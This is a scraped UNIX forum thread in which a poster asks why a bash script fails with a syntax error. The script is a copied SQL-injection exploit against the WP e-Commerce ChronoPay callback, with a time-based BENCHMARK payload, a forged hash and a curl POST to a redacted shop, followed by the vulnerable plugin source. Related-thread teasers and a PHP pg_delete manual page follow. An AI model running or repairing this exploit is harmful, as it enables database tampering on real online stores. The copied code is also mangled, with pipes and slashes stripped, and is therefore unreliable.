Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Syntax error near unexpected token `('
Top Forums Shell Programming and Scripting Syntax error near unexpected token `(' Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Old 05-02-2012
Syntax error near unexpected token `('
What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this-load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
.wp-e-commercewpsc-corewpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . 'wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
            }
 
 
.wp-e-commercewpsc-merchantschronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings-Payments-General Settings-
               Chronopay-Edit-Security Key
             - problem is that there are more popular payment gateways enlisted (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill'
                        $wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
                                            `processed` = '2',
                                            `transactid` = '.$transaction_id.',
                                            `date` = '.time().'
                                        WHERE `sessionid` = .$sessionid. LIMIT 1);
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
 

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

3. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

4. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

5. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token '('

I tried to execute the code but I got this error ./Array.c: line 9: syntax error near unexpected token '(' ./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);' and #include<stdio.h> #define MAXARRAY 1000 main() { int a, nvals; nvals =... (7 Replies)
Discussion started by: sgradywhite
7 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

8. How to Post in the The UNIX and Linux Forums

Syntax error near unexpected token `('

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

9. UNIX for Beginners Questions & Answers

Syntax error near unexpected token

Dears, While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this. test.sh: line 30: syntax error near unexpected token `done' test.sh: line 30: ` done ' #!/bin/sh # Rev. PA1 # author: eillops # date: 26-04-2018 # #... (1 Reply)
Discussion started by: Kamesh G
1 Replies

10. Ubuntu

Syntax error near unexpected token `('

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies

LEARN ABOUT PHP

pg_delete

PG_DELETE(3)															      PG_DELETE(3)

pg_delete - Deletes records

SYNOPSIS

       mixed pg_delete (resource  $connection, string  $table_name, array  $assoc_array, [int  $options = PGSQL_DML_EXEC])

DESCRIPTION

       pg_delete(3)  deletes  records  from  a	table specified by the keys and values in $assoc_array. If $options is specified, pg_convert(3) is
       applied to $assoc_array with the specified options.

PARAMETERS

	      o $connection
		- PostgreSQL database connection resource.

	      o $table_name
		- Name of the table from which to delete rows.

	      o $assoc_array
		- An array whose keys are field names in the table $table_name, and whose values are the values of those fields  that  are  to	be
		deleted.

	      o $options
		-  Any	number	of PGSQL_CONV_FORCE_NULL, PGSQL_DML_NO_CONV, PGSQL_DML_ESCAPE, PGSQL_DML_EXEC, PGSQL_DML_ASYNC or PGSQL_DML_STRING
		combined. If PGSQL_DML_STRING is part of the $options then query string is returned. When PGSQL_DML_NO_CONV or PGSQL_DML_ESCAPE is
		set, it does not call pg_convert(3) internally.

RETURN VALUES

	Returns TRUE on success or FALSE on failure. Returns string if PGSQL_DML_STRING is passed via $options.

EXAMPLES

       Example #1

	      pg_delete(3) example

	      <?php
		$db = pg_connect('dbname=foo');
		// This is safe, since $_POST is converted automatically
		$res = pg_delete($db, 'post_log', $_POST);
		if ($res) {
		    echo "POST data is deleted: $res
";
		} else {
		    echo "User must have sent wrong inputs
";
		}
	      ?>

CHANGELOG

       +-------------+---------------------------------------------------+
       |  Version    |							 |
       |	     |							 |
       |	     |			  Description			 |
       |	     |							 |
       +-------------+---------------------------------------------------+
       |   5.6.0     |							 |
       |	     |							 |
       |	     |	No  longer  experimental. Added PGSQL_DML_ESCAPE |
       |	     | constant, TRUE/ FALSE and NULL data type support. |
       |	     |							 |
       |5.5.3/5.4.19 |							 |
       |	     |							 |
       |	     |	Direct SQL injection to $table_name and Indirect |
       |	     | SQL injection to identifiers are fixed.		 |
       |	     |							 |
       +-------------+---------------------------------------------------+
SEE ALSO

       pg_convert(3).

PHP Documentation Group 													      PG_DELETE(3)
All times are GMT -4. The time now is 09:59 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy